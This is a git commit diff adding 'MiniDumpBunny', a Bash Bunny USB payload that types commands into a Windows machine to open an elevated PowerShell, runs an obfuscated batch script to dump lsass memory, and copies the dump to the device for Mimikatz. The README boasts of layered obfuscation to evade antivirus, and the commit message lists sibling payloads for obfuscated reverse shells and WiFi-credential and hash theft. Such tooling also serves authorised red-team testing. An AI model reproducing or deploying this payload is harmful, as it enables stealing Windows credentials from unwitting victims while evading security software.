Uploaded MiniDumpBunny (#503)

* Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇 * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md * Deleted ReverseBunny.txt Deleted because of higher risk to get caught by AV * Updated ReverseBunny to version 1.2 Updated ReverseBunny to version 1.2. - Deleted payload on disk because of AV - Added custom shell design * Updated ReverseBunny to version 1.2 Updated README for ReverseBunny update * Updated payload fixed some stupid left overs <3 * Uploaded pingUinBunny a reverse shell using icmp * Delete payloads/library/remote_access/switch1 directory * Uploaded pingUinBunny A reverse shell using icmp * Update README.md * Update README.md * Updated to PingZhell * Update Bunny.pl * Update README.md * Update README.md * Update payload.txt * Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl * Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 * Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md * Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt * Update payload.txt * Update README.md * Update README.md * Update Bunny.pl * Created ProcDumpBunny Dump lsass.exe with a renamed version of procdump and get the users hashes with Mimikatz * Update README.md * Update payload.txt * Updated ReverseBunny Fixed wrong DELAY commands * Updated PingZhellBunny Fixed wrong DELAY commands * Updated WifiSnatch Fixed multiple mistakes * Uploaded HashDumpBunny Use your BashBunny to dump the user hashes of your target - similar to the msf post-module. The script was obfuscated with multiple layers, so don't be confused. If you don't trust this script, run it within a save testing space - which should be best practice anyways ;) * added example picture * Update README.md * Uploaded SessionBunny Utilize SessionGopher (Slightly modified) to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords. Afterwards decide which is important and what you want to save onto your BashBunny. * Uploaded SessionBunny Utilize the famous, here slightly modified SessionGopher script, to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords. Decide which inforamtion you wanna take with you - save it onto your BashBunny! * Update README.md * Delete SessionBunny directory * Uploaded MiniDumpBunny Dump lsass with this rewritten and for BashBunny adapted version of Powersploits Out-MiniDump.
2025-10-29 16:58:25 +00:00 · 2022-03-14 15:25:29 +01:00 · 2022-03-14 15:25:29 +01:00 · 6bacea8bc8
commit 6bacea8bc8
parent 2e297ba861
4 changed files with 62 additions and 0 deletions
--- a/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat
+++ b/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat
@ -0,0 +1,2 @@
+挦獬
+潰敷獲敨汬攮數ⴠ湥⁣䅊睂䡁䅉睢橂䝁䅕督穂䍁䅁児杁䕁䅣党あ䍁䄰䅕祂䝁䄸睙求䡁䅍督杁䝁䅷督桂䡁䅍督㝁䍁䅧杢求䡁䅣兌偂䝁䅉杓䙂䝁䅍䅖杁䍁䅁兓偂䍁䄴睑療䕁䄰䅕祂䝁䅕督穂䝁䅫睢畂䍁䄴䅒求䕁䅙䅢桂䡁䅑党穂䙁䅑杣䙂䕁䅅兔潁䙁䅳睕㕂䡁䅍䅖求䕁䄰杌灂䝁䄸杌瑂䕁䅕兔偂䡁䅉入穂䡁䅑杣求䝁䅅兢摂䙁䅳督婂䙁䅍䅖䙂䕁䄰杌橂䝁䄸杔㉂䕁䅕杣啂䙁䄰杏㙁䕁䅙杣偂䝁䄰杙桂䙁䅍兒㉁䑁䅑睕啂䡁䅉兡畂䝁䅣䅋杁䍁䅣来坂䙁䅙杕楂䑁䅫睢㍂䕁䅕䅓㍁䝁䄴杖ㅁ䡁䅣李䭂䕁䅉兓䭂䕁䅫睢硁䕁䄸党㉁䝁䅧兖桂䙁䅉䅍あ䕁䅣兎偂䝁䅣兒求䝁䄰睒佂䕁䅫兕硂䙁䅅䅎㍁䕁䅣兢祁䕁䄴䅓煂䝁䄸睒灂䡁䅅杤㕁䑁䅫兎㕂䙁䅅䅢䑂䝁䅅兒兂䑁䅙免㉁䙁䅣䅣癁䝁䅯䅏牁䝁䅉杤兂䑁䅕䅏㕁䝁䄴兑䩂䕁䅑兎䩂䕁䅅䅎䝂䝁䄰督㕁䝁䅍䅡獂䡁䅣睋偂䕁䄸李灂䙁䅉兖䥂䡁䅣兢塂䙁䅫䅥偂䕁䅳免塂䕁䄴杣䵂䝁䅙䅕䉂䡁䅕䅡剂䝁䅕睍ぁ䕁䅳兤塂䕁䅣睓㍂䝁䄰䅗㑁䕁䅷睎䉂䙁䅯䅎湂䝁䅙䅖兂䕁䅍兕䡂䙁䅅䅥塂䝁䄰兡浂䕁䅣党婂䕁䅫睎啂䕁䅕睍兂䙁䅯入桂䕁䅍兏煂䑁䅁䅏坂䑁䅙睒䍂䑁䅁杗呂䡁䅑䅒䵂䙁䅍杤佂䑁䅍兒㕂䑁䅕兑䩂䡁䅯兏䑂䙁䅣䅍癁䝁䅑䅢硁䕁䄴兤瑂䙁䅣睑あ䡁䅅来瑂䡁䅫䅢佂䡁䅯杚穁䝁䅣䅚㉂䝁䅳䅔坂䑁䅉杙潂䙁䅧兙噂䡁䅁䅥牂䡁䅕䅥㕁䑁䅣李湂䡁䅕䅚穂䝁䄴李䥂䙁䅍睑浂䙁䅣睢㍂䑁䅫督慂䕁䄰督湂䝁䅕兔噂䙁䅉杣㉂䝁䅅兢佂䙁䅕来䱂䡁䅧睙楂䑁䅁杗㍁䙁䅙䅔㉂䑁䅁杕瑂䡁䅕䅢睂䑁䅕睚療䝁䅉兖潂䕁䅑䅥㉁䑁䅁䅢瑂䕁䅉村睁䝁䅫杍乂䑁䅁睡剂䡁䅁䅖䱂䑁䅑杕灂䝁䅷杢ㅁ䕁䅍睖㑁䕁䅕睤啂䑁䅅䅔䕂䝁䅑䅔祂䙁䅅兢呂䝁䅯䅣楂䑁䅕兙䑂䡁䅉李睂䝁䅳兕㑁䕁䅕党䵂䕁䄰杔㑁䝁䅫兢あ䕁䅉睙硂䑁䅉睑療䡁䅍杣慂䑁䅅睓䱂䡁䅫杣湂䡁䅕村䩂䝁䅑杓坂䡁䅁免㍂䍁䅳兎睂䕁䅷杙療䡁䅍睤睁䕁䄴杍潂䍁䄸睑煂䕁䅣免ㅁ䕁䅙杗慂䍁䄸兤あ䑁䅁睒湂䡁䅑兓塂䙁䅍睎䑂䙁䅁睙䥂䕁䅳䅖啂䙁䅑睙䑂䕁䅑䅓䡂䙁䅣睔瑂䑁䅫杖浂䝁䅷兏䭂䕁䄰免ㅁ䝁䅙睤䥂䑁䅫睕穂䕁䅙兏祂䙁䅙兙婂䡁䅁兣乂䡁䅣睔ㅁ䕁䅙䅏ぁ䕁䅫睍䑂䕁䅉兢䍂䕁䅍䅥硂䝁䅧睑㍁䕁䅷睚䍂䍁䅳督療䝁䅳睒桂䑁䅁睓㕂䡁䅫兔佂䝁䄸䅔坂䕁䅉睤奂䝁䅯睖歂䡁䅅睢ㅁ䑁䅍䅕あ䡁䅫䅕䉂䡁䅁䅚䵂䑁䅑入啂䡁䅍李慂䝁䅍兤㍁䍁䄸睑卂䡁䅑䅏噂䝁䅷䅎噂䕁䅉兙㍂䙁䅫睎啂䝁䅷兖潂䡁䅍睕䝂䡁䅫杓ㅁ䕁䅷兏䵂䑁䅉睒䑂䡁䅕免ㅁ䡁䅕杔潂䝁䅯䅚求䡁䅕睖噂䝁䅍兎㕂䡁䅉睑癁䕁䄰睑乂䕁䅙兗潂䕁䅷兡ぁ䡁䅕村湂䙁䅅来塂䕁䅧䅗㉂䕁䅙杔偂䕁䄴兔䥂䝁䅉睌煂䙁䅯䅕㕂䙁䅉杢䱂䡁䅉杚硂䙁䅁䅖獂䝁䄴兕牂䙁䅧杚煂䝁䅳免䡂䡁䅙睖兂䙁䅯䅒㑁䑁䅅杖歂䙁䅣李硂䑁䅁兒ㅁ䙁䅫兙㕁䝁䅣睓穁䙁䅉䅒㉂䑁䅫杔睁䙁䅣杢㍁䡁䅙杗䝂䡁䅑䅖療䑁䅣免煂䝁䅅杗灂䍁䄸䅍呂䡁䅑睌潂䑁䅧睕硁䡁䅯免睂䕁䅯杍㑁䝁䅣杖䩂䡁䅁睔慂䙁䅯睓㉂䡁䅣党獂䕁䅯杗坂䑁䅙䅏噂䝁䅑睎啂䡁䅁兎硂䕁䄸兏穂䑁䅍条䑂䡁䅁睔灂䑁䅑免婂䡁䅍睔坂䕁䅉䅥療䝁䅫兕硁䕁䄸党穂䑁䅕兗歂䡁䅙杙求䝁䅙䅏䉂䝁䅙兗坂䝁䅧䅖䩂䝁䅅睚硁䝁䅷条橂䡁䅉兖兂䙁䅫睓牁䕁䅫兤偂䕁䅕䅚奂䑁䅣兣䭂䑁䅉兎歂䡁䅯睓浂䝁䅉䅕浂䕁䄸兎煂䙁䅍兒塂䑁䅑杕瑂䕁䄴䅥䕂䡁䅣兣灂䝁䅯兔灂䕁䅧杍穂䕁䅍杔畂䕁䅣兎剂䙁䅅杍祂䑁䅙免睂䝁䅧睓牂䕁䅧睚㕂䙁䅙村畂䡁䅧睡橂䙁䅕䅔祁䕁䅅杚婂䕁䅍来灂䕁䅕睎䵂䝁䅣兕穂䑁䅧睖奂䝁䅑兖剂䝁䄸兤㍂䙁䅕兕䩂䕁䅳兎婂䙁䅍兓灂䕁䅷兙㑁䑁䅍兎㉂䡁䅫兕穁䑁䅑兙療䝁䅍李灂䕁䅯䅒塂䑁䅁杢偂䕁䅍睓卂䝁䅫杖睁䡁䅯䅓ぁ䍁䅳睑䝂䕁䅑杓䙂䙁䅣杢硂䙁䅉䅓瑂䝁䅫杢穂䝁䅯党灂䝁䅫兙兂䝁䅅睔奂䡁䅙兕ㅁ䙁䅧睖楂䡁䅕睒湂䕁䅯杕䵂䕁䅫睌婂䕁䅑杓求䝁䄰䅣祁䕁䅣村㕁䑁䅣入楂䙁䅍兙あ䝁䅍督㍁䙁䅅䅓㙂䝁䅙䅕潂䕁䅑睡求䕁䅫杣慂䑁䅁督佂䡁䅙䅒求䕁䅫兤䉂䝁䅧䅕㕂䡁䅅䅢㍂䡁䅑杚ぁ䕁䅅睊杁䍁䅫䅉獁䙁䅳督㕂䙁䅍䅤求䝁䄰杌䩂䕁䄸杌䑂䕁䄸兢兂䙁䅉党呂䙁䅍兡偂䝁䄴杌橂䝁䄸兢睂䡁䅉兒呂䙁䅍兡偂䕁䄴兔療䕁䅑兒摂䑁䅯杏䕂䝁䅕睑偂䕁䄰䅣祂䝁䅕督呂䍁䅁克㡂䍁䅁杚偂䙁䅉兒桂䝁䅍䅡杁䡁䅳䅉畂䝁䅕睤瑁䕁䄸杙䭂䕁䅕睙啂䍁䅁䅉䩂䝁䄸杌穂䙁䅑杕求䕁䅅兔卂䝁䅕兑歂䝁䅕杕潁䍁䅑睘杁䍁䅷睗穂䡁䅫睕啂䝁䅕兢畁䡁䅑兒㑂䙁䅑杌求䝁䄴睑療䕁䅑兓畂䝁䅣兘㙁䑁䅯兙呂䕁䅍兓䩂䍁䅁克杁䡁䄰克畁䙁䅉兒䉂䕁䅑䅤療䕁䅕杢歂䍁䅧䅉灁䡁䅷兡畂䡁䅙睢䱂䕁䅕兌求䡁䅧䅣卂䕁䅕睕呂䝁䅫睢佂䅁㴽
--- a/payloads/library/credentials/MiniDumpBunny/README.md
+++ b/payloads/library/credentials/MiniDumpBunny/README.md
@ -0,0 +1,17 @@
+**Title: MiniDumpBunny**
+
+Author: 0iphor13
+
+Version: 1.0
+
+What is MiniDumpBunny?
+#
+*MiniDumpBunny uses Powersploits Out-MiniDump script to dump lsass. The script was rewritten, adapted for BashBunny usage and obfuscated in multiple ways to evade Antivirus.*
+#
+
+**Instruction:**
+
+Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
+#
+Exfiltrate the .dmp file and read it with Mimikatz.
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
--- a/payloads/library/credentials/MiniDumpBunny/mimi.png
+++ b/payloads/library/credentials/MiniDumpBunny/mimi.png
--- a/payloads/library/credentials/MiniDumpBunny/payload.txt
+++ b/payloads/library/credentials/MiniDumpBunny/payload.txt
@ -0,0 +1,43 @@
+#!/bin/bash
+#
+# Title:         MiniDumpBunny
+# Description:   Dump lsass with this script, which was obfuscated with multiple layers.
+# Author:        0iphor13
+# Version:       1.0
+# Category:      Credentials
+# Attackmodes:   HID, Storage
+
+LED SETUP
+
+Q DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+Q DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+Q DELAY 1000
+RUN WIN "powershell Start-Process powershell -Verb runAs"
+Q ENTER
+Q DELAY 1000
+Q ALT j
+Q DELAY 250
+
+Q DELAY 250
+Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\MiniBunny.bat')"
+Q DELAY 250
+Q STRING " ;mv *.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
+Q DELAY 250
+Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
+Q DELAY 250
+Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
+Q DELAY 300
+Q ENTER
+
+LED FINISH